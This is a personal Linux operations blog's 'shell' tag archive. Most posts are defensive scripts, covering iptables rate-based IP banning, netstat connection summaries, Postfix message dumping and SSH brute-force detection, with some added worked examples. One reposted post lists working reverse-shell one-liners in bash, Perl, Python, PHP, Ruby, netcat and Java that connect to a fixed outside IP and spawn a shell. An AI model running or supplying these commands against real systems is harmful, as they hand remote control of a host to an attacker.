cszer

Tag archive: shell

banip

Categories: Work, Tech, shell

#!/bin/bash
# 2014/01/02 caishzh
# Block (on port 80) any client that requested zone_protocol.aspx?zone_id more
# than LIMIT times in the last 5 minutes, unless it is whitelisted.

TODAY=$(date +%Y%m%d)
LOG=/home/caishzh/banip.log
ACCESSLOG=/opt/apache/logs/access-${TODAY}.log
TMPLOG=/tmp/banip_tmp.log
WHITELIST=/home/caishzh/whitelist
TMPTIME=$(date -d "-5 minute" +%Y%m%d%H%M)
LIMIT=30

# Keep everything from the first line stamped 5 minutes ago to the end of
# today's log. Each log line is expected to carry a YYYYmmddHHMM stamp; if
# nothing was logged in that exact minute, sed prints nothing and this run
# bans nobody. Ending the range at "$" rather than at the current minute
# avoids stopping at the first line of the current minute.
sed -n "/${TMPTIME}/,\$p" "$ACCESSLOG" >"$TMPLOG"

# Count requests per client IP (field 3 in this log format; it is field 1 in
# the default Apache common log format) and keep the IPs above LIMIT.
grep -F 'zone_protocol.aspx?zone_id' "$TMPLOG" | cut -d" " -f3 | sort | uniq -c |
awk -v limit="$LIMIT" '$1>limit{print $1,$2}' |
while read -r times ip; do
     # Literal, whole-word matches: without -w, 1.2.3.4 would also match an
     # existing rule or a whitelist entry for 1.2.3.45.
     if ! iptables-save | grep -qwF -- "$ip" && ! grep -qwF -- "$ip" "$WHITELIST"; then
          iptables -I INPUT -s "$ip" -p tcp -m tcp --dport 80 -j DROP
          echo "$(date +'%F %T')  $times  $ip" >>"$LOG"
     fi
done
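The rate check at the heart of the script, written here as an added example (not the blog's script) in the form of a function over a log file and a whitelist, so it can be run and tested without iptables. It assumes a constructed log format in which every line starts with a YYYYmmddHHMM stamp and the client IP is field 3 (the position the original cut -f3 expects); the function name banip_candidates and the sample data are this example's own. It uses a numeric comparison on the timestamp field instead of the sed /start/,/end/ range, and shows why the whitelist match must be anchored: 1.2.3.45 is whitelisted, 1.2.3.4 is not.

```bash
#!/bin/bash
# Added example, not the blog's script: the banip rate check as a function over
# a log file and a whitelist, so it can be exercised without iptables.
# Assumed (constructed) log format: YYYYmmddHHMM - CLIENT_IP "REQUEST"
# i.e. the client IP sits in field 3, as the original cut -f3 expects.

# banip_candidates LOGFILE START END LIMIT WHITELIST
# Print "count ip" (highest count first) for every IP that requested
# zone_protocol.aspx?zone_id more than LIMIT times between START and END
# (YYYYmmddHHMM, inclusive) and is not listed in WHITELIST (one IP per line).
banip_candidates() {
    local logfile=$1 start=$2 end=$3 limit=$4 whitelist=$5
    # Numeric comparison on the timestamp field instead of a sed /start/,/end/
    # range: the range prints nothing when no line carries the exact start
    # minute and stops at the first line of the end minute.
    awk -v s="$start" -v e="$end" '$1 >= s && $1 <= e' "$logfile" |
    grep -F 'zone_protocol.aspx?zone_id' |
    cut -d' ' -f3 | sort | uniq -c |
    awk -v limit="$limit" '$1 > limit {print $1, $2}' |
    while read -r times ip; do
        # -w: a whitelist entry 1.2.3.45 must not cover 1.2.3.4;
        # -F: the dots are literal, not "any character".
        grep -qwF -- "$ip" "$whitelist" || echo "$times $ip"
    done | sort -rn
}

# Constructed sample: three clients inside the window, one request outside it,
# one request to another URL that must not be counted.
write_sample() {
    local log=$1 wl=$2 i
    : >"$log"
    for i in 1 2 3 4 5; do
        echo "201401021000 - 1.2.3.4 \"GET /zone_protocol.aspx?zone_id=$i\"" >>"$log"
    done
    for i in 1 2 3 4 5 6 7; do
        echo "201401021001 - 1.2.3.45 \"GET /zone_protocol.aspx?zone_id=$i\"" >>"$log"
    done
    for i in 1 2 3 4 5 6; do
        echo "201401021001 - 10.0.0.9 \"GET /zone_protocol.aspx?zone_id=$i\"" >>"$log"
    done
    echo "201401021300 - 10.0.0.9 \"GET /zone_protocol.aspx?zone_id=1\"" >>"$log"
    echo "201401021001 - 10.0.0.9 \"GET /index.html\"" >>"$log"
    echo "1.2.3.45" >"$wl"   # whitelisted: 1.2.3.45 is skipped, 1.2.3.4 is not
}

LOGFILE=$(mktemp) && WL=$(mktemp)
write_sample "$LOGFILE" "$WL"
banip_candidates "$LOGFILE" 201401021000 201401021001 4 "$WL"
# Expected: "6 10.0.0.9" then "5 1.2.3.4"
rm -f "$LOGFILE" "$WL"
```

In the real script the output lines would feed the iptables insert; keeping the decision in a function that only prints makes the threshold and whitelist logic testable on saved logs before it touches the firewall.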
2014-04-10

A roundup of reverse shell methods (reposted)

Categories: Tech, Security

Bash (tested on Ubuntu 12.10)

bash -i >& /dev/tcp/211.152.83.2/1234 0>&1

PERL

perl -e 'use Socket;$i="211.152.83.2";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("211.152.83.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP (requires PHP's fsockopen function to be enabled)

php -r '$sock=fsockopen("211.152.83.2",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("211.152.83.2",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 211.152.83.2 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 211.152.83.2 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/211.152.83.2/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

2013-12-16

Shell commands I use often at work

Categories: Work, Linux ops, shell

List all connections in the ESTABLISHED state (top 25 remote addresses):

netstat -nta | fgrep "ESTABLISHED" | cut -b 49-75 | cut -d ':' -f1 | sort | uniq -c | sort -n -r --key=1,7 | head -25

Count connections by state:

netstat -nta | fgrep ":" | cut -b 77-90 | sort | uniq -c

netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
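The two cut -b one-liners above depend on fixed byte columns (49-75 and 77-90), which shift between netstat versions and break on wide IPv6 addresses. The following is an added example, not from the post: the same two summaries computed from awk fields, run over a constructed netstat -nta output that is embedded in the block (documentation address ranges; the function names are this example's own).

```bash
#!/bin/bash
# Added example, not from the post: connection summaries that split netstat
# output into fields instead of cutting fixed byte columns.

# Constructed netstat -nta output (documentation address ranges).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:80             203.0.113.7:51234       ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.7:51235       ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.2:40001      ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.2:40002      TIME_WAIT
tcp6       0      0 :::443                  :::*                    LISTEN
tcp6       0      0 2001:db8::5:443         2001:db8::9:55000       ESTABLISHED
EOF
}

# Connections per state, most frequent first (netstat output on stdin).
conn_state_summary() {
    awk '/^tcp/ { ++S[$NF] } END { for (a in S) print S[a], a }' | sort -rn
}

# ESTABLISHED connections per remote IP, most frequent first, ties by address.
# The port is stripped from the last colon onward, which works for both
# 203.0.113.7:51234 and 2001:db8::9:55000.
top_established_peers() {
    awk '/^tcp/ && $NF == "ESTABLISHED" {
            peer = $5; sub(/:[0-9]+$/, "", peer); ++P[peer]
         }
         END { for (p in P) print P[p], p }' |
    sort -k1,1rn -k2,2 | head -25
}

sample_netstat | conn_state_summary
# Expected: 4 ESTABLISHED / 2 LISTEN / 1 TIME_WAIT
sample_netstat | top_established_peers
# Expected: 2 203.0.113.7 / 1 198.51.100.2 / 1 2001:db8::9
```

On a live host replace sample_netstat with netstat -nta (or ss -tan, whose columns differ again, which is exactly why field-based parsing is preferable to byte offsets).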


2012-06-25

a shell

Categories: Work, Tech, shell

#!/bin/bash
# caishzh create 20120425
# Given a Postfix queue ID, dump the queued message and its delivery log lines
# to /tmp and send both files to the terminal with sz (ZMODEM).

ID="$1"
LOG="/var/log/maillog"
[ "$ID" ] || exit 0

# Field 7 of the mailq line for this queue ID is the sender address.
MAIL=$(mailq | grep -F -- "$ID" | awk '{print $7}')

[ "$MAIL" ] || exit 0

EML="/tmp/$MAIL.eml"
SENTLOG="/tmp/$MAIL.log"

postcat -q "$ID" >"$EML" || exit 0

# Delivery records for this sender (the lines carrying nrcpt=).
grep -F -- "$MAIL" "$LOG" | grep nrcpt >"$SENTLOG"

[ -f "$EML" ] && sz "$EML"
[ -f "$SENTLOG" ] && sz "$SENTLOG"
2012-04-25

Using a script to stop SSH brute-force attacks

Categories: Tech, Security, Linux ops, shell

A while ago I bought a VPS in the US, mainly for learning, and did not pay much attention to security. Today I happened to look at the /var/log/secure log:

Apr 11 11:10:05 kof sshd[18518]: Failed password for root from 1.226.82.197 port 36824 ssh2
Apr 11 11:10:10 kof sshd[18520]: Failed password for root from 1.226.82.197 port 36966 ssh2
Apr 11 11:10:15 kof sshd[18522]: Failed password for root from 1.226.82.197 port 37132 ssh2
Apr 11 11:10:19 kof sshd[18524]: Failed password for root from 1.226.82.197 port 37326 ssh2
Apr 11 11:10:24 kof sshd[18528]: Failed password for root from 1.226.82.197 port 37476 ssh2
Apr 11 11:10:29 kof sshd[18535]: Failed password for root from 1.226.82.197 port 37642 ssh2
Apr 11 11:10:34 kof sshd[18537]: Failed password for root from 1.226.82.197 port 37819 ssh2
Apr 11 11:10:39 kof sshd[18539]: Failed password for root from 1.226.82.197 port 38023 ssh2
Apr 11 11:10:44 kof sshd[18541]: Failed password for root from 1.226.82.197 port 38200 ssh2
......

A huge number of failed SSH authentications! One every 5 seconds on average!
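The log excerpt shows the pattern a blocking script has to recognise: many "Failed password" lines from one source within seconds. As an added example (not the post's script, whose body is not included here), the following function flags a source IP the first time it produces HITS failures inside any WINDOW-second span, using a sliding window rather than a count over the whole file, so a slow scanner and a burst are judged differently. The sample log embeds the lines quoted in the post plus one constructed line from an unrelated address; the function name ssh_bursts and its output format are this example's own. Timestamps are read from the HH:MM:SS field only, so the entries are assumed to fall on one day.

```bash
#!/bin/bash
# Added example, not from the post: flag a source IP once it produces HITS
# failed SSH passwords within WINDOW seconds (sliding window).

# Sample /var/log/secure: the first nine lines are the ones quoted in the
# post, the last one is constructed (a single failure from another address).
sample_secure_log() {
    cat <<'EOF'
Apr 11 11:10:05 kof sshd[18518]: Failed password for root from 1.226.82.197 port 36824 ssh2
Apr 11 11:10:10 kof sshd[18520]: Failed password for root from 1.226.82.197 port 36966 ssh2
Apr 11 11:10:15 kof sshd[18522]: Failed password for root from 1.226.82.197 port 37132 ssh2
Apr 11 11:10:19 kof sshd[18524]: Failed password for root from 1.226.82.197 port 37326 ssh2
Apr 11 11:10:24 kof sshd[18528]: Failed password for root from 1.226.82.197 port 37476 ssh2
Apr 11 11:10:29 kof sshd[18535]: Failed password for root from 1.226.82.197 port 37642 ssh2
Apr 11 11:10:34 kof sshd[18537]: Failed password for root from 1.226.82.197 port 37819 ssh2
Apr 11 11:10:39 kof sshd[18539]: Failed password for root from 1.226.82.197 port 38023 ssh2
Apr 11 11:10:44 kof sshd[18541]: Failed password for root from 1.226.82.197 port 38200 ssh2
Apr 11 11:12:03 kof sshd[18560]: Failed password for invalid user admin from 198.51.100.7 port 40100 ssh2
EOF
}

# ssh_bursts WINDOW HITS   (log on stdin)
# Prints one line per source IP the first time it reaches HITS failures inside
# a WINDOW-second span. Only the HH:MM:SS field is used, so all entries are
# assumed to belong to the same day.
ssh_bursts() {
    awk -v window="$1" -v hits="$2" '
    function tsec(hms,   a) { split(hms, a, ":"); return a[1]*3600 + a[2]*60 + a[3] }
    /sshd\[[0-9]+\]: Failed password for / {
        ip = ""
        for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
        if (ip == "") next
        t = tsec($3)
        n[ip]++; ts[ip, n[ip]] = t
        # count this failure and the earlier ones from the same IP in the window
        c = 0
        for (j = n[ip]; j >= 1 && t - ts[ip, j] <= window; j--) c++
        if (c >= hits && !(ip in flagged)) {
            flagged[ip] = 1
            print ip, "reached", c, "failures within", window "s at", $3
        }
    }'
}

sample_secure_log | ssh_bursts 60 5
# Expected: 1.226.82.197 reached 5 failures within 60s at 11:10:24
```

The single failure from 198.51.100.7 never reaches the threshold, while the address from the post trips it on its fifth attempt, 19 seconds after the first. The printed IP is what a blocking script would hand to iptables, with the same whitelist check the banip script above performs.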

2012-04-13

Shell syntax

Categories: Tech, Linux basics, shell

1. The set command
With no arguments, it lists all variables defined in the shell and their values; with arguments, it resets the positional parameters $1, $2, and so on. For example, set `date` turns the output of the date command into the positional parameters.

2. The let command
Performs arithmetic. For an operation such as i=j+1, the shell syntax is let "i=$j+1", which is equivalent to expr. The latter works only on integers, e.g. i=`expr $i + 1` (the operands and the operator must be separate arguments, so the spaces matter); with a non-integer operand the exit status is non-zero.

2011-06-13